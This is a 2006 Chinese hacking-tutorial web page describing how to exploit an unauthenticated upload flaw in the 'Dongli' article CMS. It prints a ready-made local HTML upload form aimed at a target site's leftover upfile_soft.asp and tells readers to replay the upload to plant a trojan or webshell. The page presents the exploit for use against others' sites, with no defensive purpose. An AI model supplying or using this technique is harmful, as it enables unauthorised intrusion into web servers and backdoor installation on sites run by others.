欢迎光临极品网,更多、更新的资源信息尽在Jpinw.Com!本站所有信息资源每日更新新的内容,请大家继续关注www.Jpinw.com!如果觉得本站还不错,对您有帮助,别忘了向您的朋友推荐本站!请记好本站网址:http://www.Jpinw.com,网站发展靠大家多多的支持!!!

极品网 极品课件 极品论文 极品文学 极品游戏 极品美容 极品手机资源 极品股票

#
免费资源: 免费域名 | 免费空间 | 免费推广 | 免费邮箱 | 免费硬盘 | 免费论坛 | 免费留言 | 免费统计 | 在线投稿 | 更多...
电脑学院: 操作系统 | 安全相关 | 网页设计 | 编程开发 | 建站经验 | 服务器类 | 黑客攻防 | 菜鸟入门 | 教你网赚 | 更多...
文章导航: 网赚学堂 | 网赚秘笈 | 网赚三维 | 网赚先锋 | 网赚资讯 | 感悟网赚 | 众生百态 | 经典美文 | 范文中心 | 更多...
图酷天下: 时事图酷 | 娱乐图酷 | 搞笑图酷 | 时尚图酷 | 体育图酷 | 另类经典 | 论文资源 | 课件下载 | 文学知识 | 更多...

您现在的位置: 极品网 >> 电脑学院 >> 黑客攻防 >> 漏洞研究 >> 教程正文

动力文章上传漏洞的本地利用          【字体:
动力文章上传漏洞的本地利用
作者:佚名    教程来源:不详    点击数:    更新时间:2006-5-26    

 








动力文章上传漏洞的本地利用

最近盛行动力文章上传漏洞,不少网站纷纷关闭了上传功能,但一些网站并没有删除上传文件:upfile_soft.asp

这就给本地利用创造了机会,我们可以在本地构造一个上传页面,将上传地址直接指向网站的upfile_soft.asp文件。

构造的本地upfile.htm源程序如下:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">
<!--
BODY{
BACKGROUND-COLOR: #E1F4EE;
font-size:9pt
}
.tx1 { height: 20px;font-size: 9pt; border: 1px solid; border-color: #000000; color: #0000FF}
-->
</style>

</head>
<body leftmargin="0" topmargin="0">
<form action=" http://www.xxx.com/upfile_soft.asp " method="post" name="form1" enctype="multipart/form-data">
<input name="FileName" type="FILE" class="tx1" size="40">
<input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt">
</form>
</body>
</html>

修改代码中相应的页面地址我们就可以重新进行上传抓包,继而上传我们的马儿!


  

 

教程录入:dping    责任编辑:dping 
  • 上一篇教程:

  • 下一篇教程:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最新热点 最新推荐 相关教程
    IE教程《经典文章:给IE 7添
    IE教程《经典文章:给IE 7添
    IE教程《经典文章:给IE 7添
    IE教程《经典文章:给IE 7添
    IE教程《经典文章:给IE 7添
    IE教程《经典文章:给IE 7添
    IE教程《经典文章:给IE 7添
    IE教程《经典文章:给IE 7添
    IE教程《经典文章:给IE 7添
    再暴动力上传漏洞
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    极品网
    | 设为首页 | 加入收藏 | 友情链接 | 版权声明 |
    极品网

    Copyright 2006 Jpinw.com 极品网

    备案号:申请中

    极品网